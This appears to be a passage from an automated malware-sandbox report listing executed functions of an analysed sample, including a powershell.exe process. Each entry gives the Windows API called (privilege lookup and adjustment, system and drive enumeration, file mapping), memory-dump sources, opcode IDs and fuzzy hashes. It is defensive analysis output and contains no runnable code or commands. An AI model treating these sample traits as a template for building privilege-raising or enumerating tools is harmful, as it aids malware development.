                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 07953717a2f077d93e399e9ae397e64aee8369e5d83d1ffcbd998e9d1a0d2310
                                                        • Instruction ID: 76ef952adc7700723c9026c980b6888e8bc612be9b58b7be721f2502276b4703
                                                        • Opcode Fuzzy Hash: 07953717a2f077d93e399e9ae397e64aee8369e5d83d1ffcbd998e9d1a0d2310
                                                        • Instruction Fuzzy Hash: 32114C715093C49FEB128B25DC54AA2BFB4DF47624F0881DBEDC58F263D265A808DB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028205E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02820640
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: e7b91f2c53c889d26528b23349ebf6a9d5277dd539d330eb98df361fd37b704c
                                                        • Instruction ID: 3c7d2a61dda2c779c4afff6ce8ce3ee3e037bed96dfc73e51f66321f7cf79588
                                                        • Opcode Fuzzy Hash: e7b91f2c53c889d26528b23349ebf6a9d5277dd539d330eb98df361fd37b704c
                                                        • Instruction Fuzzy Hash: 8E11C2765093C09FDB128B15DC95B52FFB4DF52220F0880DBED898B663D265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0282092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0282099C
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 2bd0ba90109f521b0548b447eaebd66c6d5119c780735e83420a6c42c16ea703
                                                        • Instruction ID: 1ab12142d16773377347d13b8294b3958b775ec0b16680263f933267397ace40
                                                        • Opcode Fuzzy Hash: 2bd0ba90109f521b0548b447eaebd66c6d5119c780735e83420a6c42c16ea703
                                                        • Instruction Fuzzy Hash: 1D11BF754093C09FE712CB25DC55B92FFB4EF17324F0980DADD898B263D265A948CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D5AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: f6074d17c37a7ae61beca8b5cb2ca2c7a998a422ab82905a1a627211e38ffea0
                                                        • Instruction ID: cf4e6124b7718b1eb414390629fa00d4b177c57575d8c2e1487433aa32a0462c
                                                        • Opcode Fuzzy Hash: f6074d17c37a7ae61beca8b5cb2ca2c7a998a422ab82905a1a627211e38ffea0
                                                        • Instruction Fuzzy Hash: DA115EB66003009FEB60DF29DC85B56FBD8EF18621F08856ADD49CB642E675E404CAB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D5AA71
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 5e744716fa988c8c1b6fe05496c50efb56f0659e2a9d25bf2bd2391b18519791
                                                        • Instruction ID: fcd8d1e1fd13b3fb65222f1d18492ad477cc38de286be94a50c713d68670fc11
                                                        • Opcode Fuzzy Hash: 5e744716fa988c8c1b6fe05496c50efb56f0659e2a9d25bf2bd2391b18519791
                                                        • Instruction Fuzzy Hash: 4411C1764097C09FDB128B25DC85A92BFA0EF07220F0980DBDD848F163D269A909C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028207C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9BC2BDD8,00000000,00000000,00000000,00000000), ref: 02820819
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: d9a38562b99863754d471fcd611da3ea4dfbc21d9b918208f5404022c66f0d44
                                                        • Instruction ID: d168d2c700a90399949e61d633be8c75d2b73dbe34d5eef84762d6d22dcf4556
                                                        • Opcode Fuzzy Hash: d9a38562b99863754d471fcd611da3ea4dfbc21d9b918208f5404022c66f0d44
                                                        • Instruction Fuzzy Hash: 0201CC7A500304EFFB209F01DC85BA7FB98DF44721F1480AAED089A281D674A948CAB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028213AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 6d97694ad22776611e7b945e3aaf47e3dd933546cde05a68fdfe9c6e49b7c6c3
                                                        • Instruction ID: 80743a18dd607a9a71cca025c78f65f2f89d3c93c69651efcc171ee1a7b907c8
                                                        • Opcode Fuzzy Hash: 6d97694ad22776611e7b945e3aaf47e3dd933546cde05a68fdfe9c6e49b7c6c3
                                                        • Instruction Fuzzy Hash: 8A11797A500704DBEB20CF56D889B66FBA4EF04620F18C4AAED4DCA652D275E448CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D5ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 22af98de825eb0e028bfab46a2aef5914c03fee49a6307dec59652308d2aafd8
                                                        • Instruction ID: 22d6804ec8f798e11768d1c292e9259947c2ea0e424d30db3f86c4c8bf9101d9
                                                        • Opcode Fuzzy Hash: 22af98de825eb0e028bfab46a2aef5914c03fee49a6307dec59652308d2aafd8
                                                        • Instruction Fuzzy Hash: AC11CEB64093809FDB11CF25DC85B92BFA4EF42220F0980ABDD488F253D275A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D5BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 81bc15507cf6a4c6d706b32eb791aad7438650fe5670dc387f364355490a6b88
                                                        • Instruction ID: 56aabbb593c2f83ff8fde6f5c6cd5b50b9e6c8d9a89ec43f50456a358d0fcf0a
                                                        • Opcode Fuzzy Hash: 81bc15507cf6a4c6d706b32eb791aad7438650fe5670dc387f364355490a6b88
                                                        • Instruction Fuzzy Hash: 79118B72500700DFEF61CF59DC85B62FBE5FF18621F0884AAEE898A612D3B1E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028201D0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 61af1dac0421b9f69ac8ffd1b5459921cc4bd5492e4cf21f436030b0ce357bb8
                                                        • Instruction ID: a4ae72cf30d69ddfce0321cd1ee069617d8bf35d1c767ea406098a7f41624c80
                                                        • Opcode Fuzzy Hash: 61af1dac0421b9f69ac8ffd1b5459921cc4bd5492e4cf21f436030b0ce357bb8
                                                        • Instruction Fuzzy Hash: 88019E7A6003048FEB11DF25DC857A6FBD8DF11624F0884ABDC09CB642D774E448CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0282104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0282109E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 82f7c54ad82f5d5af16106245aa2385dbef963d4d8d24ac3d5a031bf88140b79
                                                        • Instruction ID: 6cec7949857951614433186128d4c8f260d1ad62d29eba6c798d75a6395f0a94
                                                        • Opcode Fuzzy Hash: 82f7c54ad82f5d5af16106245aa2385dbef963d4d8d24ac3d5a031bf88140b79
                                                        • Instruction Fuzzy Hash: 96017172900600ABE310DF16DC46B66FBA8FB84A20F14816AED089B741D235F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D5A23E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 196f9d7e9ef6d1218875bbdaa91772ea4347d078b00b5c0b11201b90ee17a5af
                                                        • Instruction ID: 83ba920746e5f6ecc6635fa1a7948959d0443ae5534587eb7fee40d873f6f6ee
                                                        • Opcode Fuzzy Hash: 196f9d7e9ef6d1218875bbdaa91772ea4347d078b00b5c0b11201b90ee17a5af
                                                        • Instruction Fuzzy Hash: C3018471900600AFE310DF16DC46B66FBE8FF84A20F14816AED089B741D235F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028212FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0282132F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 5a819c0fb7d57e3e3b5aed80713bbddf8de714d7e5a76d328c16e508f0e62dfd
                                                        • Instruction ID: b82155b4dc061b033c895ffc343a82abd529fa2f6df076e08827f1af54cd2de2
                                                        • Opcode Fuzzy Hash: 5a819c0fb7d57e3e3b5aed80713bbddf8de714d7e5a76d328c16e508f0e62dfd
                                                        • Instruction Fuzzy Hash: 1701BC7A500340DFEF208F15D9897A5FBA4EF04620F18C4AADC09CBA42D279A448CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D5BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 180c1f27f6ccf364072e146eaa19f83d29d25450f730fc194d0351d7edc4438d
                                                        • Instruction ID: 0f50587077710bc20b7f9107551020c199ba7d4e5eee933276bbd1f621f01637
                                                        • Opcode Fuzzy Hash: 180c1f27f6ccf364072e146eaa19f83d29d25450f730fc194d0351d7edc4438d
                                                        • Instruction Fuzzy Hash: 4B01DB76900200DFEF61CF19DC85BA6FBA4EF04620F08C4ABDD498B656D2B5E804CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028204B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02820502
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 7f9266268524e7fc29c234882efcbb1b503d4d6d84cd633c7f762ab9cdbedf44
                                                        • Instruction ID: e10e462d5c5c7c38474cf928b503a360a90330e25d67c6764462b39abe7519c8
                                                        • Opcode Fuzzy Hash: 7f9266268524e7fc29c234882efcbb1b503d4d6d84cd633c7f762ab9cdbedf44
                                                        • Instruction Fuzzy Hash: 7E016272940601ABD310DF16DC46B26FBA4FB88B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02820F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02820FB0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 555265630e69144cd8fff7a8e715205fa0f09fd4ad13290897f1493b8446c4fe
                                                        • Instruction ID: aab98f467fd90c998ae7bfd3c306157b037879e436090b272cc74d8cefd46437
                                                        • Opcode Fuzzy Hash: 555265630e69144cd8fff7a8e715205fa0f09fd4ad13290897f1493b8446c4fe
                                                        • Instruction Fuzzy Hash: 5601BC79500304CFEB10CF15D885B66FB94EF10624F4880AADC08CF686D374E448CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D5A94A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 4e05b8ab6054a26d9f78d6b356c6b6244b5c2dfb839b73af7c6aa258ba51eb02
                                                        • Instruction ID: 5a01ce06e0c7e9ecbf03e9823ad1e26ead5ed47d17a9328a82b2becf6c0d92f4
                                                        • Opcode Fuzzy Hash: 4e05b8ab6054a26d9f78d6b356c6b6244b5c2dfb839b73af7c6aa258ba51eb02
                                                        • Instruction Fuzzy Hash: 00016272940601ABD310DF16DC46B26FBA4FB88B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0282060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02820640
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 794e6fe98391416728ffbc6afc96b7d752ae81e2b183be2bf52a6885f45fb83a
                                                        • Instruction ID: a5b623d0278405d75c3f1bc395fa7f4e07d6bdde6f52fd3ff65563a950af5435
                                                        • Opcode Fuzzy Hash: 794e6fe98391416728ffbc6afc96b7d752ae81e2b183be2bf52a6885f45fb83a
                                                        • Instruction Fuzzy Hash: DB01F479500714DFEB208F15D885761FBA0DF51625F08C0AADC498B752D375E448CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D5ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: d3ed0b38efbeff414e21dbc20e67fa4d05af43621c47d4d653a543f79dfac89a
                                                        • Instruction ID: ab393c4b5284967a74f674a475aa02433e113d99688fa5c47e4d7d2868163556
                                                        • Opcode Fuzzy Hash: d3ed0b38efbeff414e21dbc20e67fa4d05af43621c47d4d653a543f79dfac89a
                                                        • Instruction Fuzzy Hash: E501DC35404340CFEB50DF19D889BA5FBA4EF04621F48C5AACD488F202E279E404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02821116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02821148
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: a1f1facac1c17cc98a9fd9d23ac8b9e6fc4c172a089a38dcbc5facfbeb65a98b
                                                        • Instruction ID: 3235c3d96811ad2b6846c438e5d14858ee3438c8bbc9431ab787070931aa60da
                                                        • Opcode Fuzzy Hash: a1f1facac1c17cc98a9fd9d23ac8b9e6fc4c172a089a38dcbc5facfbeb65a98b
                                                        • Instruction Fuzzy Hash: 4EF0FF3D500754DFEB20CF05D889761FBA0EF00A21F18C09ACC4C8B712D279E488CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0282096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0282099C
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 2ccbd95650d83d50fcd5ab772cd4ffbf3222618227f816841abf92bbf307b3f0
                                                        • Instruction ID: 79595b6565390d8e1daec9b483c596c02cbd5abb7e3cccab66322cba52890dcc
                                                        • Opcode Fuzzy Hash: 2ccbd95650d83d50fcd5ab772cd4ffbf3222618227f816841abf92bbf307b3f0
                                                        • Instruction Fuzzy Hash: 34F0C23D504744DFEB20DF05D885765FBA0EF24726F08C09ADD4A9B716D375A448CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 351b3742afdbe3e225b366a7f4ff04a0c68b6426d19fece51191282d83f667f8
                                                        • Instruction ID: 0a0ace1a4993677f8cd7c5bb3c60655c84436455a1ccc2cce4de52d92b458ab8
                                                        • Opcode Fuzzy Hash: 351b3742afdbe3e225b366a7f4ff04a0c68b6426d19fece51191282d83f667f8
                                                        • Instruction Fuzzy Hash: 9BF0A935504744DFEB619F4AD889765FBA0EF04625F08C1AADD494B713D3B9E808CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D5AA71
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 1b1ddd656a8d963878db591af43092d48d7a1b1d647e35085ea61c1c394803b1
                                                        • Instruction ID: c255b0612f603280917f46766e7a87779194eb809bef9403dfbaf843d630780c
                                                        • Opcode Fuzzy Hash: 1b1ddd656a8d963878db591af43092d48d7a1b1d647e35085ea61c1c394803b1
                                                        • Instruction Fuzzy Hash: F7F0F036900744CFEF51CF19D989762FBA0EF05621F48C19ADD494F342D279E504CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D5A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: ba24262c3170fbaf222453f8a2fd9fad5635a077b0796edd19bfd57b9921ac35
                                                        • Instruction ID: ffc5d9a27480962de7ad39c47daa18048037d1d42f4950e5e54f89e7e63be585
                                                        • Opcode Fuzzy Hash: ba24262c3170fbaf222453f8a2fd9fad5635a077b0796edd19bfd57b9921ac35
                                                        • Instruction Fuzzy Hash: 6411A3755093809FDB12CF25DC45B92FFE4EF46221F0980EBED858B253D275A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D5A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: cd0461d5f6827ca73a36501f0e5541710d6508bec1659f288047f631859aa9e2
                                                        • Instruction ID: 502807ddc2d0c5a03de2eaa829914ef8326fd0a11409a8c60849d3f8b3cf2de5
                                                        • Opcode Fuzzy Hash: cd0461d5f6827ca73a36501f0e5541710d6508bec1659f288047f631859aa9e2
                                                        • Instruction Fuzzy Hash: F501DB76600650CFEB50DF19D8897A6FBA4EF04221F08C0AADD498B642D279E804CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05710860, Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2119690095.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9455e13201a861d92ffecd3568ef964cce38b4fa9e716c5f757ba3e4baa34af
                                                        • Instruction ID: 302a5d174230c7ee3c7ab5380fc2a5aced3cb60426434556eb1decc9003effe1
                                                        • Opcode Fuzzy Hash: e9455e13201a861d92ffecd3568ef964cce38b4fa9e716c5f757ba3e4baa34af
                                                        • Instruction Fuzzy Hash: 7EF0A02110E3E15FC70343285C644557F729E8715430E02EBD582CF1E7DA584C49D3A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D523F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101314972.0000000001D52000.00000040.00000001.sdmp, Offset: 01D52000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 503426f8c3da63fcbaa65092a35bb5fd0c36594e5d84f9a1895222634fd17540
                                                        • Instruction ID: e1099889116a7d0e27ca98d499c183d189e5b6a319219ab0b7e4c766aa62b87b
                                                        • Opcode Fuzzy Hash: 503426f8c3da63fcbaa65092a35bb5fd0c36594e5d84f9a1895222634fd17540
                                                        • Instruction Fuzzy Hash: 29D05E79204B818FEB168A1CC1A5B953FA4AF69B04F4644F9EC40CB6A3C768E585D200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D523BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101314972.0000000001D52000.00000040.00000001.sdmp, Offset: 01D52000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 319bf96dd95985b1c49816627bc9f2a73d18cdcaaf5861b79c81799ed16404ba
                                                        • Instruction ID: 736880d778082eaf5ff2787f01e802a8c9d214663b43944ca258216493c35035
                                                        • Opcode Fuzzy Hash: 319bf96dd95985b1c49816627bc9f2a73d18cdcaaf5861b79c81799ed16404ba
                                                        • Instruction Fuzzy Hash: D5D05E343006818FEB15CA1CC194F5977E4AF44700F0644ECBC008B666C3A5E884C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 3000 Parent PID: 2692 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01DFACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01DFAD37
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: ef03fa4823fe28d107845af59dfb5cd8485a7f6ad9661e37bafd654de126ef06
                                                        • Instruction ID: 85e940ff2ac4cbbbd827c90ce2cee31acbb2bafa3b8b9debd2ec159e8aebc932
                                                        • Opcode Fuzzy Hash: ef03fa4823fe28d107845af59dfb5cd8485a7f6ad9661e37bafd654de126ef06
                                                        • Instruction Fuzzy Hash: 7621D3765097809FEB138F25DC44B92BFF4EF06310F0984DAE9898B1A3D2319908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01DFAD37
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 6f1d067332317cd1e5823dea4ca0c9032331eb7988413960288cc818f9411ce6
                                                        • Instruction ID: cb08f8712c43e55b309ed4ab79351d70c1913c669346cb8f40621125e01d51c8
                                                        • Opcode Fuzzy Hash: 6f1d067332317cd1e5823dea4ca0c9032331eb7988413960288cc818f9411ce6
                                                        • Instruction Fuzzy Hash: 84118C765007009FEB218F59DC84B96FBE4EF08221F08846EEE498B662E231E514CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01DFB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01DFB329
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2103114209.0000000001DFA000.00000040.00000001.sdmp, Offset: 01DFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 1918a412a803c5c5d4074e84e9e3e256c41d6575793a34f08073e5c3a61d1279
                                                        • Instruction ID: 028013ad46f93e3b05dca508fc2dee132bce7b4e4710f55d6f4f55cddd2d669a
